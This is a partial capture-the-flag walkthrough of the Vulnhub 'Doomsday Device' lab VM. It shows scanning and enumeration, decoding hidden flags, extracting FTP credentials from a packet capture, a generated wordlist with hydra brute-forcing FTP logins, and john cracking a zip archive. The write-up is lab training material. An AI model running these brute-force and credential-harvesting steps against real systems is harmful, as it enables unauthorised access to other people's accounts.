Vulnhub: Doomsday Device machine walkthrough (partial)

Doomsday Device

Identifying the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.177.0/16   |   Screen View: Unique Hosts                                                                                                                                                            
                                                                                                                                                                                                                                 
 3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                                                                                                                                 
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor                                                                                                                                                                
 192.168.56.100  08:00:27:2b:cc:72      1      60  PCS Systemtechnik GmbH                                                                                                                                                        
 192.168.56.187  08:00:27:ce:3c:0e      1      60  PCS Systemtechnik GmbH           

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.187.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.187 -oN nmap_full_scan
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-18 02:23 EST
Nmap scan report for bogon (192.168.56.187)
Host is up (0.00020s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE    SERVICE VERSION
21/tcp    open     ftp     vsftpd 3.0.3
22/tcp    filtered ssh
80/tcp    open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry 
|_/nothingtoseehere
|_http-server-header: Apache/2.4.29 (Ubuntu)
18888/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Koken API error
|_http-trane-info: Problem with XML parsing of /evox/about
|_http-server-header: Apache/2.4.29 (Ubuntu)
65533/tcp open     http    Apache httpd 2.4.29
|_http-title: 403 Forbidden
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 08:00:27:CE:3C:0E (Oracle VirtualBox virtual NIC)
Service Info: Host: 127.0.1.1; OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.79 seconds
                                                               

The Nmap scan shows that the target host has 4 open ports.

Get Access

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ftp 192.168.56.187               
Connected to 192.168.56.187.
220 (vsFTPd 3.0.3)
Name (192.168.56.187:kali): anonymous
331 Please specify the password.
Password: 
530 Login incorrect.
ftp: Login failed
ftp> 
ftp> quit
221 Goodbye.

FTP does not allow anonymous access. The FTP service is vsftpd 3.0.3, which has no exploitable vulnerability.

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/ 
<!DOCTYPE html>
<html>
<head>
<style>
body {
  background-image: url('background.png');
  background-repeat: no-repeat;
  background-attachment: fixed;  
  background-size: cover;
}
</style>
</head>
<body>

</body>
</html>


 <!-- Li0tLSAuLiAtLSAvIC4tIC0uIC0uLiAvIC4tLS4gLi0gLS0gLyAuLi4uIC4tIC4uLi0gLiAvIC0gLi0gLi0uLiAtLi0gLiAtLi4gLyAuLSAtLi4uIC0tLSAuLi0gLSAvIC0tIC4gLyAuLiAtLiAvIC0tIC0tLSAuLS4gLi4uIC4gLyAtLi0uIC0tLSAtLi4gLiAvIC4uLiAuIC4uLi0gLiAuLS4gLi0gLi0uLiAvIC0gLi4gLS0gLiAuLi4gLi0uLS4tIC8gLS4uLiAuLi0gLSAvIC4tLS0gLS0tIC0uLSAuIC4tLS0tLiAuLi4gLyAtLS0gLS4gLyAtIC4uLi4gLiAtLSAvIC0uLi4gLiAtLi0uIC4tIC4uLSAuLi4gLiAvIC4uIC8gLS4tIC0uIC0tLSAuLS0gLyAtLSAtLS0gLi0uIC4uLiAuIC8gLS4tLiAtLS0gLS4uIC4gLi0uLS4tIC8gLi4uIC4uIC0uIC0uLS4gLiAvIC0uLS0gLS0tIC4uLSAvIC0uLS4gLS0tIC4uLSAuLS4uIC0uLiAvIC4tLiAuIC4tIC0uLiAvIC0gLi4uLiAuLiAuLi4gLyAuLiAvIC4tIC4uLiAuLi4gLi4tIC0tIC4gLyAtLi0tIC0tLSAuLi0gLyAtLi0gLS4gLS0tIC4tLSAvIC4uIC0gLyAtIC0tLSAtLS0gLi0uLS4tIC8gLi0gLS4gLS4tLSAuLS0gLi0gLS4tLSAuLi4gLyAtIC4uLi4gLi4gLi4uIC8gLi4gLi4uIC8gLi0tLSAuLi0gLi4uIC0gLyAtIC4uLi4gLiAvIC4uLS4gLi4gLi0uIC4uLiAtIC8gLi4tLiAuLS4uIC4tIC0tLiAtLS4uLS0gLyAtLi0tIC0tLSAuLi0gLyAuLS0gLi4gLi0uLiAuLS4uIC8gLS4gLiAuLi4tIC4gLi0uIC8gLS4tLiAuLS4gLi0gLS4tLiAtLi0gLyAtLSAtLi0tIC8gLi4gLS4gLS0uIC4gLS4gLi4gLS0tIC4uLSAuLi4gLyAtLSAuLSAtLi0uIC4uLi4gLi4gLS4gLiAtLS4uLS0gLyAtLi4gLS0tIC0uIC4tLS0tLiAtIC8gLi4tLiAtLS0gLi0uIC0tLiAuIC0gLyAuLiAvIC4tIC0tIC8gLS4uLiAuIC0gLSAuIC4tLiAvIC0gLi4uLiAuLSAtLiAvIC0uLS0gLS0tIC4uLSAvIC4uLi4gLi0gLi4uLSAuIC8gLiAuLi4tIC4gLi0uIC8gLS4uLiAuIC4gLS4gLyAtLS0gLi0uIC8gLiAuLi4tIC4gLi0uIC8gLi0tIC4uIC4tLi4gLi0uLiAvIC0uLi4gLiAtLi0uLS0gLyAtLi4gLi0tIC4uIC0tLiAuLi4uIC0gLyAuLi0uIC4tLi4gLi0gLS0uIC4tLS0tIC0tLS4uLiAvIC0tLS4uIC0uLS4gLi0gLi4tLiAtLS0tLiAtLi0uIC0uLi4uIC4uLi4tIC4uLS4gLS0tLS4gLS4uIC4tLS0tIC4tLS0tIC0tLS4uIC4tLS0tIC4uLS0tIC0tLS0tIC0uLi4uIC4uLS4gLiAtLi0uIC0tLi4uIC4uLS4gLi4uLi0gLS0tLS0gLi0gLS0uLi4gLi4uLi4gLi4tLS0gLi4uLi0gLS4uLiAuLi4tLQ== -->


Visiting port 80, the returned page source contains an HTML comment; base64-decoding it gives:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ echo "Li0tLSAuLiAtLSAvIC4tIC0uIC0uLiAvIC4tLS4gLi0gLS0gLyAuLi4uIC4tIC4uLi0gLiAvIC0gLi0gLi0uLiAtLi0gLiAtLi4gLyAuLSAtLi4uIC0tLSAuLi0gLSAvIC0tIC4gLyAuLiAtLiAvIC0tIC0tLSAuLS4gLi4uIC4gLyAtLi0uIC0tLSAtLi4gLiAvIC4uLiAuIC4uLi0gLiAuLS4gLi0gLi0uLiAvIC0gLi4gLS0gLiAuLi4gLi0uLS4tIC8gLS4uLiAuLi0gLSAvIC4tLS0gLS0tIC0uLSAuIC4tLS0tLiAuLi4gLyAtLS0gLS4gLyAtIC4uLi4gLiAtLSAvIC0uLi4gLiAtLi0uIC4tIC4uLSAuLi4gLiAvIC4uIC8gLS4tIC0uIC0tLSAuLS0gLyAtLSAtLS0gLi0uIC4uLiAuIC8gLS4tLiAtLS0gLS4uIC4gLi0uLS4tIC8gLi4uIC4uIC0uIC0uLS4gLiAvIC0uLS0gLS0tIC4uLSAvIC0uLS4gLS0tIC4uLSAuLS4uIC0uLiAvIC4tLiAuIC4tIC0uLiAvIC0gLi4uLiAuLiAuLi4gLyAuLiAvIC4tIC4uLiAuLi4gLi4tIC0tIC4gLyAtLi0tIC0tLSAuLi0gLyAtLi0gLS4gLS0tIC4tLSAvIC4uIC0gLyAtIC0tLSAtLS0gLi0uLS4tIC8gLi0gLS4gLS4tLSAuLS0gLi0gLS4tLSAuLi4gLyAtIC4uLi4gLi4gLi4uIC8gLi4gLi4uIC8gLi0tLSAuLi0gLi4uIC0gLyAtIC4uLi4gLiAvIC4uLS4gLi4gLi0uIC4uLiAtIC8gLi4tLiAuLS4uIC4tIC0tLiAtLS4uLS0gLyAtLi0tIC0tLSAuLi0gLyAuLS0gLi4gLi0uLiAuLS4uIC8gLS4gLiAuLi4tIC4gLi0uIC8gLS4tLiAuLS4gLi0gLS4tLiAtLi0gLyAtLSAtLi0tIC8gLi4gLS4gLS0uIC4gLS4gLi4gLS0tIC4uLSAuLi4gLyAtLSAuLSAtLi0uIC4uLi4gLi4gLS4gLiAtLS4uLS0gLyAtLi4gLS0tIC0uIC4tLS0tLiAtIC8gLi4tLiAtLS0gLi0uIC0tLiAuIC0gLyAuLiAvIC4tIC0tIC8gLS4uLiAuIC0gLSAuIC4tLiAvIC0gLi4uLiAuLSAtLiAvIC0uLS0gLS0tIC4uLSAvIC4uLi4gLi0gLi4uLSAuIC8gLiAuLi4tIC4gLi0uIC8gLS4uLiAuIC4gLS4gLyAtLS0gLi0uIC8gLiAuLi4tIC4gLi0uIC8gLi0tIC4uIC4tLi4gLi0uLiAvIC0uLi4gLiAtLi0uLS0gLyAtLi4gLi0tIC4uIC0tLiAuLi4uIC0gLyAuLi0uIC4tLi4gLi0gLS0uIC4tLS0tIC0tLS4uLiAvIC0tLS4uIC0uLS4gLi0gLi4tLiAtLS0tLiAtLi0uIC0uLi4uIC4uLi4tIC4uLS4gLS0tLS4gLS4uIC4tLS0tIC4tLS0tIC0tLS4uIC4tLS0tIC4uLS0tIC0tLS0tIC0uLi4uIC4uLS4gLiAtLi0uIC0tLi4uIC4uLS4gLi4uLi0gLS0tLS0gLi0gLS0uLi4gLi4uLi4gLi4tLS0gLi4uLi0gLS4uLiAuLi4tLQ==" | base64 -d
.--- .. -- / .- -. -.. / .--. .- -- / .... .- ...- . / - .- .-.. -.- . -.. / .- -... --- ..- - / -- . / .. -. / -- --- .-. ... . / -.-. --- -.. . / ... . ...- . .-. .- .-.. / - .. -- . ... .-.-.- / -... ..- - / .--- --- -.- . .----. ... / --- -. / - .... . -- / -... . -.-. .- ..- ... . / .. / -.- -. --- .-- / -- --- .-. ... . / -.-. --- -.. . .-.-.- / ... .. -. -.-. . / -.-- --- ..- / -.-. --- ..- .-.. -.. / .-. . .- -.. / - .... .. ... / .. / .- ... ... ..- -- . / -.-- --- ..- / -.- -. --- .-- / .. - / - --- --- .-.-.- / .- -. -.-- .-- .- -.-- ... / - .... .. ... / .. ... / .--- ..- ... - / - .... . / ..-. .. .-. ... - / ..-. .-.. .- --. --..-- / -.-- --- ..- / .-- .. .-.. .-.. / -. . ...- . .-. / -.-. .-. .- -.-. -.- / -- -.-- / .. -. --. . -. .. --- ..- ... / -- .- -.-. .... .. -. . --..-- / -.. --- -. .----. - / ..-. --- .-. --. . - / .. / .- -- / -... . - - . .-. / - .... .- -. / -.-- --- ..- / .... .- ...- . / . ...- . .-. / -... . . -. / --- .-. / . ...- . .-. / .-- .. .-.. .-.. / -... . -.-.-- / -.. .-- .. --. .... - / ..-. .-.. .- --. .---- ---... / ---.. -.-. .- ..-. ----. -.-. -.... ....- ..-. ----. -.. .---- .---- ---.. .---- ..--- ----- -.... ..-. . -.-. --... ..-. ....- ----- .- --... ..... ..--- ....- -... ...--     

The resulting data looks like Morse code; decode it further (using the CyberChef website):

JIMANDPAMHAVETALKEDABOUTMEINMORSECODESEVERALTIMES.BUTJOKE'SONTHEMBECAUSEIKNOWMORSECODE.SINCEYOUCOULDREADTHISIASSUMEYOUKNOWITTOO.ANYWAYSTHISISJUSTTHEFIRSTFLAG,YOUWILLNEVERCRACKMYINGENIOUSMACHINE,DON'TFORGETIAMBETTERTHANYOUHAVEEVERBEENOREVERWILLBE!DWIGHTFLAG1:8CAF9C64F9D1181206FEC7F40A7524B3

This yields the first flag: FLAG1:8CAF9C64F9D1181206FEC7F40A7524B3
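The two decoding steps above (base64, then Morse) as an added Python example; this is not code from the original write-up. The sample input is the tail of the Morse string recovered from the page comment, re-encoded to base64 inline, so the script runs offline.

```python
import base64

# International Morse table covering the letters, digits and punctuation
# used in the hidden comment (".-.-.-" is '.', "--..--" is ',',
# ".----." is the apostrophe, "---..." is ':', "-.-.--" is '!').
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
    ".-.-.-": ".", "--..--": ",", ".----.": "'", "---...": ":", "-.-.--": "!",
    "..--..": "?", "-....-": "-", "-..-.": "/",
}


def morse_to_text(morse: str) -> str:
    """Decode space-separated Morse; '/' separates words.

    Unknown symbols become '?' so a bad token is visible instead of being
    silently dropped (CyberChef would do the same kind of substitution).
    """
    words = []
    for word in morse.strip().split("/"):
        words.append("".join(MORSE.get(sym, "?") for sym in word.split()))
    return " ".join(words)


def decode_hidden_comment(b64: str) -> str:
    """base64 -> Morse -> text, the pipeline the write-up ran by hand."""
    morse = base64.b64decode(b64).decode("ascii")
    return morse_to_text(morse)


# Constructed sample: the last three words of the page's Morse string,
# base64-encoded here so the whole pipeline can be exercised offline.
SAMPLE_MORSE = ("-.. .-- .. --. .... - / ..-. .-.. .- --. .---- ---... / "
                "---.. -.-. .- ..-. ----. -.-. -.... ....- ..-. ----. -.. .---- "
                ".---- ---.. .---- ..--- ----- -.... ..-. . -.-. --... ..-. ....- "
                "----- .- --... ..... ..--- ....- -... ...--")
SAMPLE_B64 = base64.b64encode(SAMPLE_MORSE.encode("ascii")).decode("ascii")

if __name__ == "__main__":
    print(decode_hidden_comment(SAMPLE_B64))
```

Feeding the full base64 blob from the page comment into `decode_hidden_comment` reproduces the CyberChef result, with word breaks restored.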

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ gobuster dir -u http://192.168.56.187 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.187
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/18 02:43:40 Starting gobuster in directory enumeration mode
===============================================================
/nick                 (Status: 301) [Size: 315] [--> http://192.168.56.187/nick/]
/staffblog            (Status: 301) [Size: 320] [--> http://192.168.56.187/staffblog/]
/server-status        (Status: 403) [Size: 279]
Progress: 218827 / 220561 (99.21%)===============================================================
2022/11/18 02:44:07 Finished
===============================================================

The scan finds two directories, /nick and /staffblog; let's look at each in the browser to see what they contain.

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/robots.txt
User-agent: *
Disallow: /nothingtoseehere
                                
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ curl http://192.168.56.187/nick/     
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
 <head>
  <title>Index of /nick</title>
 </head>
 <body>
<h1>Index of /nick</h1>
  <table>
   <tr><th valign="top"><img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a></th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size</a></th><th><a href="?C=D;O=A">Description</a></th></tr>
   <tr><th colspan="5"><hr></th></tr>
<tr><td valign="top"><img src="/icons/back.gif" alt="[PARENTDIR]"></td><td><a href="/">Parent Directory</a></td><td>&nbsp;</td><td align="right">  - </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/text.gif" alt="[TXT]"></td><td><a href="farewell.txt">farewell.txt</a></td><td align="right">2020-11-30 08:58  </td><td align="right">399 </td><td>&nbsp;</td></tr>
<tr><td valign="top"><img src="/icons/unknown.gif" alt="[   ]"></td><td><a href="nick.pcap">nick.pcap</a></td><td align="right">2020-10-19 07:58  </td><td align="right">7.6K</td><td>&nbsp;</td></tr>
   <tr><th colspan="5"><hr></th></tr>
</table>
<address>Apache/2.4.29 (Ubuntu) Server at 192.168.56.187 Port 80</address>
</body></html>
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ wget http://192.168.56.187/nick/farewell.txt          
--2022-11-18 02:46:37--  http://192.168.56.187/nick/farewell.txt
Connecting to 192.168.56.187:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 399 [text/plain]
Saving to: ‘farewell.txt’

farewell.txt                                             100%[================================================================================================================================>]     399  --.-KB/s    in 0s      

2022-11-18 02:46:37 (94.4 MB/s) - ‘farewell.txt’ saved [399/399]

                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat farewell.txt                
Hey Michael!

I just wanted to say goodbye. Through Teach for America, I'm gonna go down to Detroit and teach inner-city kids about computers. You know, I'm the lame IT guy and probably you don't even know my name so, who cares. But I just wanted you to know that the old creepy guy uses a pretty weak password. You know, the one who smells like death. You should do something about it. 

Nick
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ mv ~/Downloads/nick.pcap                     
mv: missing destination file operand after '/home/kali/Downloads/nick.pcap'
Try 'mv --help' for more information.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ mv ~/Downloads/nick.pcap .
                                                      

This gives us a packet capture file, and farewell.txt tells us that one user has a weak password.

The /staffblog directory contains a document; download it to the local Kali Linux machine and view it, which yields the 3rd flag:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
CreedThoughts.doc  farewell.txt  nick.pcap  nmap_full_scan
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat CreedThoughts.doc 
Creed Thoughts! �www.creedthoughts.gov.www/creedthoughts
Today in my office where I work as Director of Quality Assurance, we went to the beach for some reason that was never adequately explained. When we were there, our manager told us to eat hot coals. I thought that was a little bit untoward so I ate a fish. Then a woman I have literally never seen before in my entire life started talking very loudly about something involving Halpert. She was agitated, I,d say. From what I could guess, she was definitely on drugs of some kind, perhaps cocaine, or maybe ▒ drines. Also, she is a knock-out. She reminds me of a young Daphne Du Maurier. Also, I stupidly ate the fishbones. I told myself  never again � after the last time, but th�FLAG3: �0f1ff7bt��>p24c0082be83a8b8c497rd is not safe enough. I wonder how he found out. Anyways, I added 3 digits to the end so it s supersafe now. Nobody's gonna crack that, baby!

FLAG3: 0f1ff7btp24c0082be83a8b8c497rd

But we still haven't seen the 2nd flag.

Right, there's still the packet capture that we haven't examined:

Here we see the username and password: creed creed
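As an added example (not part of the original write-up; nick.pcap itself is not reproduced), a dependency-free Python parser that pulls cleartext FTP USER/PASS pairs out of a pcap file. The capture it runs on is constructed inline and mirrors the failed creed/creed login the page describes; pointing `extract_ftp_logins` at a real capture is how a defender confirms credentials are crossing the wire unencrypted.

```python
import struct


def _tcp_frame(src_ip, dst_ip, sport, dport, payload):
    """Minimal Ethernet/IPv4/TCP frame; checksums are left zero because the
    parser below only reads header fields."""
    eth = b"\x08\x00\x27\x00\x00\x01" + b"\x08\x00\x27\x00\x00\x02" + b"\x08\x00"
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 1, 0, 64, 6, 0,
                     bytes(int(o) for o in src_ip.split(".")),
                     bytes(int(o) for o in dst_ip.split(".")))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, 1, 1, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap():
    """Constructed capture (not the real nick.pcap): one cleartext FTP login."""
    exchange = [
        ("192.168.56.187", "192.168.56.50", 21, 40001, b"220 (vsFTPd 3.0.3)\r\n"),
        ("192.168.56.50", "192.168.56.187", 40001, 21, b"USER creed\r\n"),
        ("192.168.56.187", "192.168.56.50", 21, 40001, b"331 Please specify the password.\r\n"),
        ("192.168.56.50", "192.168.56.187", 40001, 21, b"PASS creed\r\n"),
        ("192.168.56.187", "192.168.56.50", 21, 40001, b"530 Login incorrect.\r\n"),
    ]
    # pcap global header: magic, v2.4, thiszone, sigfigs, snaplen, LINKTYPE_ETHERNET
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, (src, dst, sport, dport, data) in enumerate(exchange):
        frame = _tcp_frame(src, dst, sport, dport, data)
        # record header: ts_sec, ts_usec, incl_len, orig_len
        out += struct.pack("<IIII", 1600000000 + i, 0, len(frame), len(frame)) + frame
    return out


def iter_tcp_payloads(pcap):
    """Yield (src_ip, dst_ip, dport, payload) for every TCP segment with data."""
    magic, = struct.unpack_from("<I", pcap, 0)
    endian = "<" if magic == 0xA1B2C3D4 else ">"
    off = 24
    while off + 16 <= len(pcap):
        _sec, _usec, incl, _orig = struct.unpack_from(endian + "IIII", pcap, off)
        frame = pcap[off + 16: off + 16 + incl]
        off += 16 + incl
        if len(frame) < 34 or frame[12:14] != b"\x08\x00":
            continue                      # not IPv4
        ihl = (frame[14] & 0x0F) * 4
        if frame[23] != 6:
            continue                      # not TCP
        src = ".".join(str(b) for b in frame[26:30])
        dst = ".".join(str(b) for b in frame[30:34])
        tcp = frame[14 + ihl:]
        if len(tcp) < 20:
            continue
        dport = struct.unpack_from("!H", tcp, 2)[0]
        payload = tcp[(tcp[12] >> 4) * 4:]
        if payload:
            yield src, dst, dport, payload


def extract_ftp_logins(pcap):
    """Return [(client, server, user, password)] for each USER/PASS pair sent
    to port 21. FTP sends both verbs in cleartext, so anyone who can capture
    the traffic (as nick.pcap shows) recovers the credentials."""
    pending, logins = {}, []
    for src, dst, dport, payload in iter_tcp_payloads(pcap):
        if dport != 21:
            continue
        verb, _, arg = payload.decode("ascii", "replace").strip().partition(" ")
        if verb.upper() == "USER":
            pending[(src, dst)] = arg
        elif verb.upper() == "PASS" and (src, dst) in pending:
            logins.append((src, dst, pending.pop((src, dst)), arg))
    return logins


if __name__ == "__main__":
    for client, server, user, pw in extract_ftp_logins(build_sample_pcap()):
        print(f"{client} -> {server}: USER {user} PASS {pw}")
```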

Let's log in to FTP and see what's there. Strangely, though, these credentials don't let us log in.

The earlier creedthoughts.doc document contains this sentence: I wonder how he found out. Anyways, I added 3 digits to the end so it s supersafe now. Nobody's gonna crack that, baby

In other words, the author appended 3 digits to creed to form the new password, so we need to generate a wordlist ourselves and then crack it.

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat wordlist_generator.py 
# Generate candidate passwords "creed" + three digits (creed000 .. creed999),
# one per line, for hydra to try against the FTP service.
with open('password_list', 'w') as f:
    for i in range(1000):
        # zero-pad so every candidate really has 3 digits after "creed"
        password = f'creed{i:03d}'
        f.write(password + '\n')

Run this Python script to generate the password dictionary, then use hydra to crack the login:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ hydra -l creed -P password_list ftp://192.168.56.187                    
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-11-18 03:02:36
[DATA] max 16 tasks per 1 server, overall 16 tasks, 1000 login tries (l:1/p:1000), ~63 tries per task
[DATA] attacking ftp://192.168.56.187:21/
[21][ftp] host: 192.168.56.187   login: creed   password: creed223
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-11-18 03:03:26
                                                                                      

We now have the FTP username creed and password creed223; log in to the target host's FTP service:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ftp 192.168.56.187
Connected to 192.168.56.187.
220 (vsFTPd 3.0.3)
Name (192.168.56.187:kali): creed
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||40081|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2026 Nov 12  2020 archive.zip
-rw-r--r--    1 0        0             176 Nov 30  2020 reminder.txt
226 Directory send OK.
ftp> get reminder.txt
local: reminder.txt remote: reminder.txt
229 Entering Extended Passive Mode (|||40004|)
150 Opening BINARY mode data connection for reminder.txt (176 bytes).
100% |*************************************************************************************************************************************************************************************|   176      126.19 KiB/s    00:00 ETA
226 Transfer complete.
176 bytes received in 00:00 (98.89 KiB/s)
ftp> get archive.zip
local: archive.zip remote: archive.zip
229 Entering Extended Passive Mode (|||40086|)
150 Opening BINARY mode data connection for archive.zip (2026 bytes).
100% |*************************************************************************************************************************************************************************************|  2026        3.84 MiB/s    00:00 ETA
226 Transfer complete.
2026 bytes received in 00:00 (1.97 MiB/s)
ftp> quit
221 Goodbye.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
archive.zip  CreedThoughts.doc  farewell.txt  nick.pcap  nmap_full_scan  password_list  reminder.txt  wordlist_generator.py
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat reminder.txt         
Oh snap, I forgot the password for this zip file. I remember, it made Michael laugh when he heard it, but Pam got really offended.

#FLAG4: 4955cbee5a6a5a48ce79624932bd1374

This gives the 4th flag, and the author hints that the zip file needs to be cracked.

But the cracking attempt fails:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ zip2john archive.zip > hashes
ver 2.0 efh 5455 efh 7875 archive.zip/email PKZIP Encr: TS_chk, cmplen=320, decmplen=460, crc=535FE2E6 ts=4A59 cs=4a59 type=8
ver 2.0 efh 5455 efh 7875 archive.zip/michael PKZIP Encr: TS_chk, cmplen=1372, decmplen=1766, crc=3B8FD23B ts=68CA cs=68ca type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ ls
archive.zip  CreedThoughts.doc  farewell.txt  hashes  nick.pcap  nmap_full_scan  password_list  reminder.txt  wordlist_generator.py
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-18 03:06) 0g/s 11033Kp/s 11033Kc/s 11033KC/s !LUVDKR!..*7¡Vamos!
Session completed. 
                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ unzip archive.zip 
Archive:  archive.zip
[archive.zip] email password:                                                                                                                                                                                                                                   
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt hashes
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:01 DONE (2022-11-18 03:07) 0g/s 13925Kp/s 13925Kc/s 13925KC/s !LUVDKR!..*7¡Vamos!
Session completed. 

Looking at other people's write-ups, the author's hint is that the password appears in season 7 episode 9 (I honestly had no idea).

The password is: bigboobz

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat email       
To: oscar@dundermifflin.com
Subject: Costume Party
From: michael@dundermifflin.com
Content-Type: text/html; charset="utf8"

Hey Oscar!

Angela is out sick so she couldn't manage the costume party gallery right now. Dwight showed up as a jamaican zombie woman AGAIN. It's gross. Please remove the picture from the gallery. Oh yeah, you don't have access to it, so just use Angela's profile. The password is most probably one of her cats name. 

Michael                                                                                                                                                                                                                                  
┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ cat michael        
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,CF1CA7F9558B5637B0C9F66B972B6AB6
[encrypted key body omitted]
-----END RSA PRIVATE KEY-----
                                   

The author hints that this key is angela's, and that its passphrase is the name of one of her cats.

Now look at port 18888. Note that gobuster and dirb don't work here; you need ffuf or wfuzz to enumerate the directories:

┌──(kali㉿kali)-[~/Vulnhub/Doomsday_Device]
└─$ wfuzz -c -u http://192.168.56.187:18888/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 0
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://192.168.56.187:18888/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                                                          
=====================================================================

000000001:   200        50 L     181 W      2991 Ch     "# directory-list-2.3-medium.txt"                                                                                                                                
000000003:   200        50 L     181 W      2991 Ch     "# Copyright 2007 James Fisher"                                                                                                                                  
000000007:   200        50 L     181 W      2991 Ch     "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                                                
